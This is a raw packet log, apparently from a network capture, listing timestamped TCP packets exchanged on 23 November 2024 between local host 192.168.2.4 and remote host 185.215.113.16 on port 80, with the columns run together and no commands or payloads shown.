                                                                                                                                                                                                Nov 23, 2024 16:53:32.443789005 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.443839073 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.443927050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.443979979 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.444499016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.444554090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.444570065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.444618940 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.444739103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.444785118 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.445271015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.445329905 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.445344925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.445396900 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.445420980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.445473909 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.446119070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.446171999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.446188927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.446223021 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.446284056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.446330070 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.446862936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.446923018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.446938038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.446983099 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.446999073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.447041988 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.447716951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.447732925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.447748899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.447782993 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.447947025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.447990894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.448436022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.448508024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.448523045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.448538065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.448563099 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.448606014 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.449232101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.449279070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.449295998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.449318886 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.449372053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.449415922 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.450021982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.450054884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.450071096 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.450097084 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.450154066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.450196028 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.450858116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.450931072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.450946093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.450982094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.451019049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.451061010 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.451632977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.451683044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.451703072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.451724052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.451745987 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.451837063 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.452419043 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.452460051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.452476025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.452517986 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.452555895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.452609062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.453186035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.453233004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.453248978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.453283072 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.453336000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.453516960 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.453979015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.454036951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.454051018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.454098940 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.454142094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.454482079 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.454780102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.454808950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.454823971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.454876900 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.454909086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.454952955 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.455574036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.455609083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.455635071 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.455651045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.455660105 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.455712080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.456490040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.456557035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.456574917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.456590891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.456621885 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.456659079 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.457143068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.457175016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.457187891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.457241058 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.647676945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.647900105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.647916079 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.647929907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.647955894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648024082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648078918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648113012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648128986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648154974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648170948 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648210049 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648778915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648802042 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648818016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648900032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648907900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.648953915 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.649564981 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.649621010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.649636984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.649673939 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.649702072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.649750948 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.650335073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.650408030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.650425911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.650474072 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.650665045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.650748968 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.651246071 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.651299953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.651331902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.651346922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.651371956 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.651427984 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.651927948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.652025938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.652041912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.652064085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.652081966 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.652123928 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.652715921 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.652781010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.652796030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.652844906 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.652940989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.652988911 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.653511047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.653599024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.653614044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.653660059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.653810024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.653852940 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.654304028 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.654344082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.654360056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.654401064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.654438972 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.654516935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.655078888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.655131102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.655145884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.655191898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.655227900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.655273914 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.655889988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.655940056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.655953884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.655999899 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.656052113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.656097889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.656707048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.656764984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.656780005 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.656847954 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.656950951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.656996012 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.657485008 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.657547951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.657562971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.657608032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.657665968 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.657721043 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.658297062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.658344984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.658360958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.658402920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.658418894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.658458948 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.659048080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.659099102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.659115076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.659162998 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.659183025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.659228086 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660020113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660059929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660074949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660099030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660125017 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660162926 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660634041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660660982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660676003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660712004 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660736084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.660784006 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.661569118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.661583900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.661600113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.661614895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.661638021 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.661688089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.662211895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.662264109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.662278891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.662327051 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.662357092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.662403107 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663002968 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663053989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663069963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663103104 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663140059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663187027 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663820982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663844109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663858891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663902998 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663904905 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.663949966 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.664604902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.664659023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.664674044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.664720058 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.664751053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.664794922 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.665368080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.665424109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.665440083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.665463924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.665489912 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.665519953 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.666188002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.666263103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.666286945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.666309118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.666311026 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.666369915 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.666986942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.667020082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.667036057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.667058945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.667062998 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.667098999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.667787075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.667803049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.667821884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.667855024 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.709572077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.858553886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.858603954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.858628988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.858645916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.858710051 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.858895063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.858922958 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.859010935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.859059095 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.859083891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.859405041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.859447002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.859462976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.859496117 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.859546900 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.859580994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.860167980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.860225916 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.860261917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.860276937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.860321999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.860349894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.861895084 CET8049744185.215.113.16192.168.2.4
